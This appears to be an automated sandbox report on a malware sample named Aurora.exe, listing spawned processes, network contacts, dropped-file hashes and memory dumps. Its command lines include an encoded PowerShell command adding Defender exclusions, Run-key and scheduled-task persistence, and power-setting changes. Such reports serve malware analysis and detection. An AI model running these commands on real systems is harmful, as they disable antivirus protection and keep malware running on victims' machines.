PID 1124 wrote to memory of 208 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2788 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4252 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1712 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 4252 wrote to memory of 1224 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\SysWOW64\cmd.exe
PID 1712 wrote to memory of 4200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1712 wrote to memory of 4200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1712 wrote to memory of 4200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1224 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe

"C:\Users\Admin\AppData\Local\Temp\Aurora_V2\Aurora.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p146312891125116171371883110193 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAFUAYQB2ADUAcQBkAFQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBLAEgAOQBLACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcAA3AFYAZgBWAFkAVwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA3AGIAYgBDADkAMQBhADUAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'kwweifjdskdv' -Value '"C:\Users\Admin\AppData\Local\kwweifjdskdv\kwweifjdskdv.exe"' -PropertyType 'String'

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk648" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Network

Country Destination Domain Proto
NL 45.15.156.167:80 tcp
US 8.8.8.8:53 167.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
NL 195.20.16.153:80 195.20.16.153 tcp
US 8.8.8.8:53 153.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 joxi.net udp
US 172.67.162.70:80 joxi.net tcp
US 172.67.162.70:443 joxi.net tcp
US 8.8.8.8:53 70.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 94.193.125.74.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 195.20.16.153:80 195.20.16.153 tcp
NL 195.20.16.153:80 195.20.16.153 tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/2364-0-0x00000000007B0000-0x0000000000800000-memory.dmp

memory/2364-4-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2364-5-0x0000000005330000-0x000000000582E000-memory.dmp

memory/2364-6-0x0000000004ED0000-0x0000000004F62000-memory.dmp

memory/2364-7-0x0000000005110000-0x0000000005120000-memory.dmp

memory/2364-8-0x0000000004E80000-0x0000000004E8A000-memory.dmp

memory/2364-9-0x0000000006280000-0x0000000006886000-memory.dmp

memory/2364-10-0x0000000007AE0000-0x0000000007BEA000-memory.dmp

memory/2364-11-0x00000000079F0000-0x0000000007A02000-memory.dmp

memory/2364-12-0x0000000007A50000-0x0000000007A8E000-memory.dmp

memory/2364-13-0x0000000007A90000-0x0000000007ADB000-memory.dmp

memory/2364-14-0x0000000008D30000-0x0000000008D96000-memory.dmp

memory/2364-15-0x0000000009040000-0x0000000009090000-memory.dmp

memory/2364-16-0x0000000009E00000-0x0000000009FC2000-memory.dmp

memory/2364-17-0x000000000A500000-0x000000000AA2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\conhost.exe

MD5 8340b7602e82921aa8d72ae4f8ea11cc
SHA1 a49524d26639130bc09acb4a0187917fbc5ec003
SHA256 efee38133480e7ccaa11424d49bb3d8ebdb89ffb1d81a10f6c405337e7d3a737
SHA512 eab92e881f24d6fdcb061540c3ee96f4d4fa9e26a7ef1ea82743ebca3e64821f94467cc65a2c3e83ee4c9091cc4e714e938b9f583c3dc9f88938555322e04f10

C:\Users\Admin\AppData\Local\Temp\main\main.bat

MD5 4edd28bf306d37273a4b30ef3f75d92f
SHA1 db8fbd39931f0faaa160c700435279210bf97cc3
SHA256 e49d849e2a89613a493a07ee4f15f56cde89073e1dc527a4881846dd03eaa130
SHA512 b05fb8ff44ce032d09f096de855d99d64f64c03dead392863aa186edd05809fc99825862432dc7b826447b5880fe7b1eeb6135502df35d0227c16691665530df

C:\Users\Admin\AppData\Local\Temp\main\file.bin

MD5 fc7c63ffa72326c3641efbdf507ab046
SHA1 a65964ee890eabc1e09d16ad4a36fa0530290435
SHA256 3bac3a7196c4e1f347bbfc4bb7319c14a60155edadb246cc41f3a251b76f3bf6
SHA512 39168751411ceff6b44013bb3eb2ca4a59c6b11f119d3fac72fcf85d401113170dd056d8dcdce29f0f60b38feedc0cb4bc72461ed32c17d6a616c446eacd62e8

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\Users\Admin\AppData\Local\Temp\main\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

MD5 7f93db1b1ba5dd798ee0fb7ac1ee5b5a
SHA1 b68db4bdb7ad77c720a1861ec9158b49b99c3473
SHA256 50806e50951c2ab080a1ad10873349940355d49cbecf564bdc4d3ca65516dff2
SHA512 41e7df8738ef3f549d20c3943d0a4b2aa34e91675604d0bec62fa6633d7fb262a38adcde70b8c08639cbf9d62cf043b4220b8fc20483f061687815da22faef5a

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

MD5 ca8acb796044d922702f2fedd039c718
SHA1 45b997cc60b4875eec3f462006f1605dcb16c984
SHA256 710634857b5c70a6b6f014da45b0e1705a180aca3f2c1d53c39aa179d2451671
SHA512 591c1da7c720500440aa47bc52423457d0963eca381451a6163a144c0168ed863b45872020a2a6fa645b97db397e93060265f7c150616a039c2aed25cd0607da

C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

MD5 6141fcd89a442521fabada983b07696a
SHA1 c884d75aa3df2ab52ad128146e45825466db257e
SHA256 5a4414a62987d89c24f62ba447cb25b3310a4e543dcb505a807e62a77d8d1426
SHA512 5f482678d7c71127d67f9b52d3e4c4e99111a4a2bbcbf36e299f57c6fffb354a490d573ee565b99483ac9b3ff015fc9337dffdb5d739a94d1994662a5dde0107

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

MD5 b5e813efd092c823e641722e0e721cf2
SHA1 e381b6fc4a362091a4b09e6e366d15efdb6820d3
SHA256 fe75fd8c297d1d223ba238caa95e2d3bd9436538d125c8b87f62a297aeb11b42
SHA512 be677d3811cd2a3f6b187ac53e7086307776abc9fef39165c4b0a54aceaa332a88da84e4ce4234a653c12a2a57dabd77ddf74b40ae9e709436b8ac6ef7d96283

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 2c1b47e61eea814395d12967f51eedba
SHA1 85593a9de1515caad975be4ec2e95d2451cb8246
SHA256 cad7a1b429d70e52ee7d52b474e30318c7196fb9f12400e030387e48316e6373
SHA512 77e7e5314095f77dc8c7c0b3b20d485e4e30f85dc2c8536bc56fc00f5ac23bd1a8d1a7bf2a6249f03a9daa55cf222e049058d8375e3c60de72406cdaefff02be

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 995201bd2171b22a161c689db920afa6
SHA1 09871ed7f73b9a80b3e2a8771afffdec7fbf663c
SHA256 ff5bf4791c645ee863365f11206d2fb3188343f141624b35779c52816e27a13e
SHA512 68fd5796bff605ef0864ac25699db76cfd9dc7e3a6141bfb0902aa2977373cf66607294787635b83a2c0b29dcba39a11863b97982a6f26a05288b0551e9f822e

memory/2788-66-0x0000000000690000-0x0000000000D18000-memory.dmp

memory/2788-65-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2788-67-0x0000000005C00000-0x0000000005C9C000-memory.dmp

memory/2364-68-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2788-70-0x0000000005F00000-0x0000000006250000-memory.dmp

memory/2788-69-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-72-0x0000000006250000-0x00000000064A6000-memory.dmp

memory/2364-74-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2788-75-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/2788-76-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-77-0x00000000068F0000-0x0000000006A82000-memory.dmp

\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/2788-83-0x00000000032A0000-0x00000000032B0000-memory.dmp

memory/2788-84-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-87-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-86-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-89-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-88-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-85-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-90-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-91-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/776-93-0x0000000000400000-0x000000000040E000-memory.dmp

memory/2788-92-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-94-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/776-97-0x00000000054B0000-0x00000000054C0000-memory.dmp

memory/776-95-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/776-98-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-101-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-99-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-102-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-100-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-104-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-103-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-106-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-109-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-108-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-112-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-114-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-115-0x0000000000400000-0x000000000040E000-memory.dmp

memory/776-117-0x0000000000400000-0x000000000040E000-memory.dmp

memory/4252-128-0x0000000000400000-0x000000000040C000-memory.dmp

memory/1872-133-0x0000000000860000-0x0000000000960000-memory.dmp

memory/4252-134-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/4252-135-0x00000000050B0000-0x00000000050C0000-memory.dmp

memory/2788-138-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/208-140-0x0000000006640000-0x0000000006676000-memory.dmp

memory/2788-139-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/208-141-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/208-144-0x0000000006E10000-0x0000000007438000-memory.dmp

memory/2788-143-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-142-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-146-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/2788-145-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/208-147-0x0000000006D60000-0x0000000006D82000-memory.dmp

memory/208-148-0x0000000007440000-0x00000000074A6000-memory.dmp

memory/208-149-0x0000000007660000-0x000000000767C000-memory.dmp

memory/208-150-0x0000000007C90000-0x0000000007CDB000-memory.dmp

memory/208-151-0x0000000007DE0000-0x0000000007E56000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2gbtavo.0qj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/208-168-0x0000000008E90000-0x0000000008EC3000-memory.dmp

memory/2788-169-0x0000000005E00000-0x0000000005F00000-memory.dmp

memory/208-170-0x0000000070310000-0x000000007035B000-memory.dmp

memory/776-171-0x0000000073B40000-0x000000007422E000-memory.dmp

memory/208-173-0x000000007F270000-0x000000007F280000-memory.dmp

memory/208-172-0x0000000008E70000-0x0000000008E8E000-memory.dmp

memory/208-178-0x0000000009010000-0x00000000090B5000-memory.dmp

memory/208-179-0x00000000067D0000-0x00000000067E0000-memory.dmp

memory/208-180-0x00000000091D0000-0x0000000009264000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 db01a2c1c7e70b2b038edf8ad5ad9826
SHA1 540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512 c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 99c90c326481f56c85dd35d84c79adf2
SHA1 abae424259d56d1d724ad4c22812576f466a3bc5
SHA256 217c98f50549795fccb4bbc2f8cf9bfc31bce93ce300e1c16fbc3b31d6282ece
SHA512 a128ecfcdf9e5348edc2b879d9f4428d693ba4a80b7339c4ee45ee15a31c1e7f4f3d1e6c09e424e3ba65ecc8a0a9d72075ef7a00fbcf249539c3dceab68719ab